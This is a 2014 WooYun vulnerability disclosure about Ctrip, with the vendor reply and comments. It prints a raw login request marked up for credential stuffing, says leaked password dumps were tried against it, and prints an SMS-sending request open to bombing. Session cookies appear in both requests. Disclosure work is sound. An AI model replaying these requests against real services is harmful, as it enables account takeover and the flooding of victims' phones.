当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082848

漏洞标题:携程某接口接口缺陷可撞库(已测试部分数据)及短信轰炸

相关厂商:携程旅行网

漏洞作者: 0ps

提交时间:2014-11-11 10:59

修复时间:2014-12-26 11:00

公开时间:2014-12-26 11:00

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-11: 细节已通知厂商并且等待厂商处理中
2014-11-11: 厂商已经确认,细节仅向厂商公开
2014-11-21: 细节向核心白帽子及相关领域专家公开
2014-12-01: 细节向普通白帽子公开
2014-12-11: 细节向实习白帽子公开
2014-12-26: 细节向公众公开

简要描述:

接口1、登陆接口未防护,导致可撞库,大量用户密码可被猜解。
接口2、短信接口未控制,导致短信轰炸。
然后我想说,厂商,看这里:$$$

详细说明:

BUG1、
问题接口:https://accounts.ctrip.com/globalwap/account/login/
基本上其他国家的WAP页面登陆口都在这里进行验证的,但是没做任何的限制
登录时抓取数据包:

POST /globalwap/account/login/ HTTP/1.1
Host: accounts.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://accounts.ctrip.com/globalwap/account/login/
Cookie: _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1222595445370.18yv31.1.1415607878326.1415670913381.3.426; _jzqco=%7C%7C%7C%7C1415599563950%7C1.1614112599.1415595504733.1415670919253.1415671025719.1415670919253.1415671025719.0.0.0.82.82; __zpspc=9.8.1415670919.1415671025.2%231%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415611614.1415670919.2; __utmz=1.1415611614.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.10922190.1415595506; LoginStatus=1%7czfhtiysc15im2huhnfiy1jnq480123%2c; Union=AllianceID=10530&SID=333189&OUID=000401app-96; Session=SmartLinkCode=222&SmartLinkKeyWord=&SmartLinkQuary=&SmartLinkHost=&SmartLinkLanguage=zh; zdata=zdata=fbtJpBv9C0ehaHww5dt8ARz60iM=; bid=bid=F; Customer=HAL=ctrip_en; TraceSessionEx=E787F98E577C6F54D7617658F2BF7756; login_type=0; login_uid=920F895E064728DE01786; StartCity_Pkg=PkgStartCity=28; OrderCountForMyCtrip=NotravelOrderCount=0&UnSubmitOrderCount=0&WaitAllReviewCount=0&WaitReviewOrderCount=0&WaitTravelOrderCount=0; WAPACHOST=de.ctrip.com; WAPACLANG=de; WAPACBACK=; __utma=1.1094494192215595506.1415611614.1415670919.2; __utmz=1.14152.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TracingUserFlag=ab461c5bfe83ae82; TracingErrorFlag=8b15a8523781bcb8; TracingUserFlag=; M133664218=6; _abtest_userid=17f7299f-dac6-459c-bb15-31af7030162d; ticket_ctrip=uoeOwviAJ6VQEgTNwLuTqSV9j/bS+aOP3Riia12QZsD2giTsSgRspVxT9gVTWKAxJ4HkD23fApqQ3QMOE5IaeSosSdj/B3EvFJUBZysEweyWgXWo5xMG3TUgsErz5oLdCian0tw0kzvhAoK6dTc3++u1ZIAWd2eGOCM0/XmfsdolFtzXzgHfvXqOHZ54WcGrBSN2WW2cLo6BkwPpv5BLIPjgaTJ/9x8PPkNgZ/uhrs82GPpb3azYzoaTdBIbzJW6VCLWjA==; corpid=; corpname=; CtripUserInfo=VipGrade=0&UserName=%c2b%aa%ce%fb%ce%fb%22eadMessageCount=0&U=A58C63A452CFD6E6F68962A25FC; AHeadUserInfo=VipGrade=0&UserName=%c2%aa%ce%fb%ce%fb%2f&NoReadMessageCount=0&U=A22CFD6E6F68962A25FC; auto=FD846C1C8F1C7AA17FEA3A964F6A499CB9D01E6030DD50D5; TicketSiteID=SiteID=1005; _bfs=1.7; _bfi=p1%32003%26p2%3D100111%21%3D426%26v2%3D425; __utmb=1.3.10.1415670919; __utmc=1; __utmt=1; NSC_WT_Bddpvout_443=ffffffff09001c7445525d5f4f58455e445a4a423660; NSC_WT_Bddpvout_80=ffffffff09001c2045525d5f4f58455e445a4a423660; NSC_WT_bddpvout.hmpcbm_443=ffffffff09001c2b45525d5f4f58455e445a4a423660; __utmb=1.3.10.1415670919; __utmc=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
UserName=§15555555555§&Password=§111111111§


这里使用互联网的流出的裤子进行撞库,仅使用了一小部分数据进行测试,成功率非常大。
BUG2、
短信接口未限制,可导致短信轰炸:

GET /card/ajax/AjaxSendCommonSms.aspx?tempid=0.6355477791943324&typeKey=Register&uid=&mp=15555555555&sendType=1 HTTP/1.1
Host: b.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://b.ctrip.com/card/Register/Register3.aspx?phone=13888888888
Cookie: NSC_WT_C_80=fffddd2245525d5f4f58455e445a4a423660; ASP.NET_SessionId=5b3c5m4d0wbddddtgb3m; _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1415595445370.18yv31.1.1415dd445370.1415595445370.1.5; _bfs=1.5; _bfi=p1%3D0%26ddd5%26v2%3D4; _jzqco=%7C%7C%7C%7C%7C1.1614112599.1415dd504733.1415595504733.1415595504734.1415dd95504733.1415595504734.0.0.0.1.1; __zpspc=9.1.1415595504.1415595504.1%234%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415595506.1415595506.1; __utmb=1.2.10.1415595506; __utmc=1; __utmz=1.1415595506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; corpname=; CoCode=; CtripUserId=; corpid=; _ga=GA1.2.1094494190.1415595506; _gat=1
Connection: keep-alive


此短信接口无任何限制.....

漏洞证明:

111020243a3ede5aea31906d4c5b8f345b41aedd.jpg


11102038ef4d72636a23d996853e75c5318a99ad.jpg

修复方案:

在登陆接口加个验证吧

版权声明:转载请注明来源 0ps@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-11-11 11:53

厂商回复:

撞库漏洞在本月7号已经有白帽子提交过,所以您提交的撞库漏洞只能按照忽略处理。
短信轰炸漏洞经过确认存在且此前无人提交过。
十分感谢您的提交。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-12 09:24 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    短信轰炸才1?你真亏

  2. 2014-12-26 11:17 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    短信轰炸才1?你真亏

  3. 2014-12-26 13:39 | 带我玩 ( 路人 | Rank:12 漏洞数:6 | 带我玩)

    短信轰炸才1?你真亏